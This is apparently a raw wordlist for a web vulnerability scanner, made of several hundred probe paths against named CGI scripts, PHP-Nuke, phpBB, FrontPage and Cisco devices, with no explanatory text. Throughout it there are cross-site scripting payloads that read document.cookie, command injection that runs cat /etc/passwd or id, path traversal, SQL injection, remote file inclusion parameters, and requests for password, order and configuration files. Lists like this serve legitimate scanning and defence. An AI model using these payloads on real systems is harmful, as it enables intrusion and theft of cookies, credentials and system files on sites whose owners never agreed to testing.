nosuchurl/><script>alert('Vulnerable')</script>
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/myguestbook.cgi?action=view
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/diagnose.cgi
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.asp
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
catinfo?<u><b>TESTING
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
webamil/test.php
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
user.php?op=userinfo&uname=<script>alert('hi');</script>
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search.php?zoom_query=<script>alert(\"hello\")</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.asp?term=<%00script>alert('Vulnerable')</script>
script>alert('Vulnerable')</script>.cfm
samples/search.dll?query=<script>alert(document.cookie)</script>
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpimageview.php?pic=javascript:alert('Vulnerable')
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
node/view/666\"><script>alert(document.domain)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mailman/listinfo/<script>alert('Vulnerable')</script>
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
jigsaw/
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php/\"><script><script>alert(document.cookie)</script><
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
bb000001.pl<script>alert('Vulnerable')</script>
article.php?sid=\"><Img
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
anthill/login.php
admin/login.php?path=\"></form><form
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addressbook/index.php?name=<script>alert('Vulnerable')</script>
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
a?<script>alert('Vulnerable')</script>
a.jsp/<script>alert('Vulnerable')</script>
?mod=<script>alert(document.cookie)</script>&op=browse
<script>alert('Vulnerable')</script>.thtml
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.aspx
/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
cgi-bin/title.cgi
cgi-bin/compatible.cgi
add_user.php
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/retrieve_password.pl
cgi-bin/wwwadmin.pl
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/sendmail.cfm
cgi-bin/bigconf.cgi
cgi-bin/webmap.cgi
cgi-bin/wwwwais
ammerum/
ariadne/
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin-sdb/printenv
ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
db/users.dat
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/dumpenv.pl
cgi-bin/htsearch?-c/nonexistant
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/orders/orders.txt
cgi-bin/processit.pl
cgi-bin/rpm_query
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/ws_ftp.ini
cgi-bin/WS_FTP.ini
?sql_debug=1
a_security.htm
Admin_files/order.log
admin.html
admin/cplogfile.log
admin/system_footer.php
cfdocs/snippets/fileexists.cfm
cgi-bin/MachineInfo
chat/!nicks.txt
chat/!pwds.txt
chat/data/usr
com
COM
config.php
config/
cplogfile.log
cutenews/index.php?debug
examples/jsp/snp/anything.snp
file-that-is-not-real-2002.php3
index.php?sql_debug=1
cgi-bin/view-source?view-source
cgi-bin/webplus?about
cfdocs/snippets/viewexample.cfm
chassis/config/GeneralChassisConfig.html
cgi-bin/ibill.pm
cgi-bin/scoadminreg.cgi
cgi-bin/SGB_DIR/superguestconfig
hp/device/this.LCDispatcher
cfdocs/snippets/evaluate.cfm
cfide/Administrator/startstop.html
cgi-bin/icat
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/query?mss=%2e%2e/config
cgi-bin/test-cgi?/*
cgi-bin/update.dpgs
cgi-bin/view-source
Mem/dynaform/FileExplorer.htm
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/lastlines.cgi?process
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cgicso?query=AAA
cgi-bin/cgiwrap
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/Count.cgi
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/echo.bat
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/listrec.pl
cgi-bin/mailnews.cgi
cgi-bin/mmstdod.cgi
cgi-bin/pagelog.cgi
cgi-bin/perl?-v
cgi-bin/perl.exe?-v
cgi-bin/perl.exe
cgi-bin/perl
cgi-bin/plusmail
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/sscd_suncourier.pl
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/vpasswd.cgi
cgi-bin/webgais
cgi-bin/websendmail
cgi-bin/whois.cgi?action=load&whois=%3Bid
cd-cgi/sscd_suncourier.pl
cgi-bin/common/listrec.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/webdist.cgi
DB4Web/10.10.10.10:100
ews/ews/architext_query.pl
exec/show/config/cr
instantwebmail/message.php
cfdocs/snippets/gettempdirectory.cfm
cgi-bin/stat.pl
cgi-bin/cachemgr.cgi
cgi-bin/ppdscgi.exe
cgi-bin/sws/admin.html
cgi-bin/webif.cgi
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin.php4?reg_login=1
admin/admin_phpinfo.php4
admin/login.php?action=insert&username=test&password=test
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
interscan/cgi-bin/FtpSave.dll?I'm%20Here
ext.ini.%00.txt
cgi-bin/webdriver
dostuff.php?action=modify_user
cgi-bin/c32web.exe/ChangeAdminPassword
accounts/getuserdesc.asp
cgi-bin/cgi-lib.pl
cgi-bin/log/nether-log.pl?checkit
cgi-bin/mini_logger.cgi
cgi-bin/mt-static/
cgi-bin/mt/
cgi-bin/nimages.php
cgi-bin/robadmin.cgi
Admin/
cgi-bin/netpad.cgi
cgi-bin/troops.cgi
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/rwwwshell.pl
cgi-bin/photo/manage.cgi
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
agentadmin.php
b2-include/b2edit.showposts.php
catalog/includes/include_once.php
errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
sqldump.sql
structure.sql
servlet/SessionManager
php.ini
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
ip.txt
JUNK(6).cfm?mode=debug
level/42/exec/show%20conf
livehelp/
LiveHelp/
logicworks.ini
login.jsp
logins.html
logs/str_err.log
mall_log_files/order.log
mambo/administrator/phpinfo.php
megabook/files/20/setup.db
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
myinvoicer/config.inc
officescan/hotdownload/ofscan.ini
order/order_log_v12.dat
order/order_log.dat
orders/order_log_v12.dat
Orders/order_log_v12.dat
orders/order_log.dat
Orders/order_log.dat
PDG_Cart/shopper.conf
phorum/admin/stats.php
php-coolfile/action.php?action=edit&file=config.php
phpBB/phpinfo.php
phpinfo.php
phpinfo.php3
pmlite.php
session/admnlogin
settings/site.ini
SiteScope/htdocs/SiteScope.html
soapdocs/ReleaseNotes.html
ssdefs/siteseed.dtd
servlet/allaire.jrun.ssi.SSIFilter
pp.php?action=login
isapi/count.pl?
krysalis/
logjam/showhits.php
manual.php
mods/apage/apage.cgi?f=file.htm.|id|
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
perl/-e%20%22system('cat%20/etc/passwd');\%22
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
Program%20Files/
smssend.php
pls/simpledad/admin_/dadentries.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
ncl_items.html
ncl_items.shtml?SUBJECT=1
photo/manage.cgi
photodata/manage.cgi
pub/english.cgi?op=rmail
pvote/ch_info.php?newpass=password&confirm=password%20
scripts/wsisa.dll/WService=anything?WSMadmin
SetSecurity.shm
submit?setoption=q&option=allowed_ips&value=255.255.255.255
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
shopadmin.asp
modsecurity.php
phpBB2/includes/db.php
<script>alert('Vulnerable')</script>
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_txt/_vti_cnf/
_vti_txt/
_vti_pvt/deptodoc.btr
_vti_pvt/doctodep.btr
_vti_pvt/services.org
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listInclude
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/_vti_aut/fp30reg.dll
_vti_pvt/access.cnf
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/service.cnf
_vti_pvt/services.cnf
_vti_pvt/svacl.cnf
_vti_pvt/writeto.cnf
_vti_pvt/linkinfo.cnf
admin/
isx.html
//
cgi-bin/blog/mt-check.cgi
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com
mailman/listinfo
doc/
doc
webalizer/
web/
usage/
sitemap.xml
phpshare/phpshare.php
photo_album/apa_phpinclude.inc.php
cgis/wwwboard/wwwboard.cgi
cgis/wwwboard/wwwboard.pl
affich.php?image=<script>alert(document.cookie)</script>
diapo.php?rep=<script>alert(document.cookie)</script>
index.php?rep=<script>alert(document.cookie)</script>
admin/contextAdmin/contextAdmin.html
fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
blahb.ida
blahb.idq
ab2/\@AdminViewError
.DS_Store
.FBCIndex
\"><img%20src=\"javascript:alert(document.domain)\">
Survey/Survey.Htm
WEBAGENT/CQMGSERV/CF-SINFO.TPF
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
ba4.nsf
BACLIENT
postinfo.html
na_admin/ataglance.html
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
JUNK(5).htw
ttp://127.0.0.1:2301/
file/../../../../../../../../etc/
level/16/exec/-///pwd
level/16/exec/-///show/configuration
level/16
level/16/exec/
level/16/exec//show/access-lists
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/version
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/exec//show
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
gallery/captionator.php
gallery/errors/configmode.php
gallery/errors/needinit.php
gallery/errors/reconfigure.php
gallery/errors/unconfigured.php
users.lst
WS_FTP.LOG
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
examples/jsp/snp/snoop.jsp
nsn/env.bas
